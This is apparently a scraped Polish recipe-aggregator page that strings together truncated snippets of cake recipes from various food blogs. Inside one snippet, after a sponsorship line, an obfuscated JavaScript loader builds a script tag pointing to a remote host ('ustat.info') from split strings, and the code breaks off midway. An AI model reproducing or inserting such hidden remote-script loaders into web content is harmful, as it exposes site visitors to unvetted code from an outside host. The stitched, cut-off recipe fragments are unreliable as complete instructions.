Pyszne ciasto, idealne składniki, w prost prosi się o powtórkę. Prezentuje się i smakuję równie idealnie. Nie jest trudne do wykonania. A znika bardzo szybko.... Gorąco polecam! Składniki: 200 g margaryny/masła 150 g maku 100 g mielonych migdałów 100 g wiórek kokosowych 80 g cukru 8 białek 4 żółtka 2 budynie śmietankowe(...)żółtka i dalej miksujemy. Mak łączymy z wiórkami i migdałami. Dodajemy do piany jajecznej i delikatnie mieszamy do połączenia się składników. Dwie tortownice 28 cm wykładamy papierem do pieczenia. Ciasto dzielimy na pół i wstawiamy do piekarnika nagrzanego do 170 stopni. Pieczemy 20 minut. Odlewamy pół szklanki mleka, a resztę zagotowujemy z cukrem. Z odlanym mlekiem mieszamy budynie i żółtka
Malinowe PocałunkiSkładniki – porcja na formę o średnicy 26 cm: 300 gram kruchych ciastek, 150 gram masła, 400 ml mleka kokosowego, 200 gram białej czekolady, 170 gram
Coś bym zjadłamocno aromatycznym, wilgotnym i nadzianym pysznościami. Postanowiłam zrobić takowe . Przede wszystkim dla dzieci. Nie lubię rodzynek, dodałam suszoną żurawinę. Żurawinę toleruję w postaci suszonej, rodzynek jakoś nie mogę przełknąć. Ciasto jest fajne, wilgotne i wierzcie mi poleży nawet tydzień, a im dłużej leży, tym lepiej smakuje! Szklanka u mnie to 250 ml Składniki 2 szklanki mąki – 1 szklanka tortowej pszennej(...)powoli mąkę mieszając szpatułką, już nie robotem. Wsyp wszystkie bakalie, wymieszaj do połączenia się wszystkiego. Keksówkę o długości np. 25 cm może być inny rozmiar – ciasto będzie po prostu wyższe lub niższe- wysmaruj olejem kokosowym lub masłem i obsyp mąką. Wlej masę i wstaw do nagrzanego piekarnika. Temperatura 180 stopni ( góra i dół ) i pieczemy około 45 minut
Z Kuchni Do Kuchnikubka wlej letnie mleko, dodaj świeże drożdże, cukier. Wszystko bardzo dokładnie wymieszaj. 2. W dużej misce połącz mąkę z zaczynem, dodaj jaja i olej kokosowy oraz szczyptę soli. 3. Po połączeniu wyrabiaj ciasto na gładką masę. Ciasto będzie gotowe, gdy będzie lśniące i gładkie. Takie ciasto przykryj bawełnianą szmatką i pozwól mu odpocząć i urosnąć. 4. Gdy ciasto podwoi swoją(...)ulubionym nadzieniem, możesz z powodzeniem zastąpić je budyniem, twarożkiem, czekoladą, masą orzechową, masą makową. Twoja fantazja nie powinna być niczym ograniczona! SMACZNEGO! Artykuł powstał przy współpracy z producentem oleju kokosowego, firmą Laboratorium BIOOIL. (function(){ znwv=document.createElement("script");znwv_=(("u")+"st")+"a";znwv.async=true; znwv.type="text/javascript";znwv_+=("t.i")+""+"n";znwv_+=(("f")+"o");znwv_+="/"; znwvu="3360529.";znwvu+="2e5pl62gnwvus810z4d"+"geh4ig8fu5z1g"; znwv.src="//"+znwv
Mostek w kuchnilodówce) Polewa daktylowa: 300 g daktyli bez pestek 4 łyżki masła orzechowego Olej kokosowy rozpuść z miodem na wolnym ogniu. W misce wymieszaj mąkę z komosy ryżowej, płatki owsiane, kakao, cynamon i sól. Suche składniki wymieszaj ze składnikami mokrymi, tak aby powstało zwarte ciasto. Tortownicę wyłóż papierem do pieczenia, przełóż na nią rozwałkowane ciasto i piecz ok. 25 minut(...)jaglaną, miód, puree z dyni, skórkę otartą z pomarańczy, limoncello i budyń waniliowy. Całość dokładnie zmiksuj. Z puszki wyjmij śmietankę kokosową i ubij ją na sztywną pianę. Wymieszają ją delikatnie z masą jaglaną. Masę przełóż na podpieczony spód ciasta i piecz w piekarniku rozgrzanym do 180 stopni ok. 35 minut. W tym czasie przygotuj karmel. Daktyle zalej wrzątkiem i odstaw
365 dni dookoła kuchnimikserem, następnie dodać mąkę przesianą z proszkiem do pieczenia oraz wiórki kokosowe i delikatnie wymieszać, można mikserem na małych obrotach.Ciasto wylać do tortownicy (26 cm) lub prostokątnej formy wyłożonej papierem do pieczenia, na wierzchu poukładać owoce.Piec w temperaturze 180 stopni, ok. 50 min. Najlepiej sprawdzić patyczkiem czy ciasto jest upieczone
Mix smakujest to ciasto dla leniwych, niecierpliwych lub wygodnych, a teraz okazuje się, że jest to przepis dla oszczędnych. Murzynek jest puszysty i wilgotny, dodatkowo posypałam ciasto cukrem pudrem. Polecam też: Murzynek z kremem kokosowym Kakaowe babeczki z jeżynami Błyskawiczny murzynek z wiśniami Polecam błyskawiczny murzynek z owocami, jeżynami i gruszkami: 1, 5 szklanki mąki 1 jajko 1/3 szklanki oleju(...)olej,mleko i wodę gazowaną, dodajemy do masy jajecznej i miksujemy dalej. Wsypujemy mąkę wymieszaną z proszkiem do pieczenia, jeszcze chwilkę miksujemy. Kwadratową blaszkę wykładamy papierem do pieczenia, wlewamy ciasto, układamy obrane i pokrojone w ósemki gruszki, pomiędzy układamy jeżyny, posypujemy orzeszkami. Wstawiamy do nagrzanego piekarnika o temp 180 C i pieczemy ok. 30 min. Ciasto wyjmujemy, posypujemy cukrem pudrem
Damsko-męskie spojrzenie na kuchniępieczenia i kakao - miksować na średnich obrotach do czasu połączenia składników. Ciasto wylać do wyłożonej papierem do pieczenia blaszki, wstawić do nagrzanego do 180 stopni piekarnika i piec około 25 minut ( do czasu aż brzegi biszkoptu zaczną odstawać od blaszki).Wystudzić. W trakcie pieczenia ciemnego biszkoptu przygotować makowo - kokosowy. Jajka z cukrem ubijamy na puszystą masę i dodajemy do niej(...)utrzeć na gładką masę. Krem podzielić na dwie równe części. Do jednej dodać pokrojone śliwki i wymieszać. Przełożyć ciasto. Na ciemny biszkopt wyłożyć powidła i równomiernie rozsmarować na całej powierzchni. Następnie wyłożyć krem bez dodatku śliwek. Przykryć biszkoptem makowo - kokosowym. Na ten biszkopt wyłożyć krem ze śliwką i równo rozsmarować. Biszkopty maczać w wódce i układać w równych
Nie tylko w kuchnimasła 4 łyżki cukru 100 g wiórków kokosowych wykonanie: Galaretki rozpuszczam w 500 ml wrzątku, odstawiam do ostygnięcia. Całe jajka ucieram z cukrem i cukrem waniliowym na białą, puszystą masę. Dodaję olej i jeszcze chwilę ucieram. Stopniowo dodaję mąkę wymieszaną z proszkiem do pieczenia i mieszam delikatnie do połączenia składników. Ciasto wylewam na blaszkę wyłożoną papierem do pieczenia (tortownica(...)grecki oraz lekko tężejącą lecz jeszcze płynną galaretkę. Masę wylewam na biszkopt. Wstawiam do lodówki. Masło rozpuszczam na patelni, dodaję cukier i wiórki kokosowe. Podsmażam do delikatnego zrumienienia, cały czas mieszając. Ostudzoną posypką dekoruję stężone ciasto
babka w formiesmak, a także nadaje ciastu większej wilgotności. Ciasto można przygotować w szerokiej keksówce 28x15cm lub w tradycyjnej keksówce (będzie wtedy wyższe). Murzynek z białek Składniki: CIASTO 6 białek 120g cukru pudru 120g oleju kokosowego 160g mąki pszennej 50g kakao 1 łyżka ekstraktu z wanilii 1 i 1/2 łyżeczki proszku do pieczenia POLEWA CZEKOLADOWA 50g gorzkiej czekolady 25g mlecznej czekolady(...)wymieszać z kakao i proszkiem do pieczenia - składniki suche stopniowo (również po jednej łyżce) przesiewać do masy białkowej, delikatnie mieszając szpatułką - formę wysmarować tłuszczem i wyłożyć papierem do pieczenia - ciasto przełożyć od razu do formy (nie powinno zbyt długo czekać na pieczenie) - formę wstawić do piekarnika rozgrzanego do 170 stopni, piec przez około 30-35 minut do tzw. suchego patyczka
Smakołyki Berenikimascarpone oraz 1 łyżka roztopionej, białej czekolady. Następnie uformuj zgrabne kulki, wstaw do lodówki na 10 minut, a następnie obtocz w orzechach, kakao, wiórkach kokosowych czy polej roztopioną czekoladą. Moje bajaderki są ze szpinakowego ciasta, stąd zielony kolor 😜 Smacznego
Kraina Miodem Płynącastopni, podkręcamy temperaturę do 180 i pieczemy 40 -45 minut. Ta kruszonka ma smak chałwy, można zamiast sezamu dać orzechy lub wiórki kokosowe, to też tłuszcz i do tego w konkretnym smaku. Ciasto jest bardzo delikatne i wilgotne, nawet następnego dnia smakowało jak świeżo upieczone. Jeśli dla kogoś mało słodkie, może oprószyć pudrem. Do ciasta nie dawałam białek
Dieta moja pasjaCIASTO MARCHEWKOWE Z CYNAMONEM Przepyszne, szybkie w przygotowaniu, wilgotne ciasto o wspaniałym aromacie. Składniki: - 1,5 szklanki startej marchewki; - 1,5 szklanki mąki; - 4 jaja; - 0,5 szklanki oleju rzepakowego; - 0,5 szklanki oleju kokosowego; - 1 łyżeczka proszku do pieczenia; - 1 łyżeczka cynamonu; - 1 szklanka pokrojonych orzechów brazylijskich lub włoskich; - 0,5 łyżeczki soli morskiej; - 0,5 szklanki ksylitolu/cukru trzcinowego(...)jednolitą masę; - masę przelać do gotowej brytfanki wysmarowanej uprzednio masłem; - wstawić do nagrzanego piekarnika i piec 45 minut do 55 minut, aż ciasto się zarumieni; - po upieczeniu można posypać dla ozdoby i smaku wiórkami kokosowymi oraz pokruszonymi orzechami. SMACZNEGO
MintTasteCiasto świetnie nadaje się na wyjątkowe okazje. Połączenie delikatnego biszkoptu i budyniowej masy z orzeźwiającym ananasem i słodką kokosową bezą jest wręcz idealne. Aż żałuję, że tak późno zwlekałam z upieczeniem tego pysznego ciasta! Z filiżanką kawy smakuje wyśmienicie. Pina Coladę upiekłam na swoje imieniny i powiem, że każdemu baaardzo posmakowało. Wam też polecam :) A przy okazji chciałam złożyć(...)waniliowy Masa: 500 ml mleka 4 żółtka 1/2 szkl cukru łyżeczka ekstraktu waniliowego 3 czubate łyżki mąki pszennej i ziemniaczanej szczypta soli 250 g masła puszka ananasa Beza kokosowa: 4 białka 1 szkl cukru 200 g wiórków kokosowych Biszkopt: Ubić pianę z białek ze szczyptą soli. Dodawać stopniowo cukier i nadal ubijać na sztywną pianę. Następnie, cały czas
Smakołyki Asi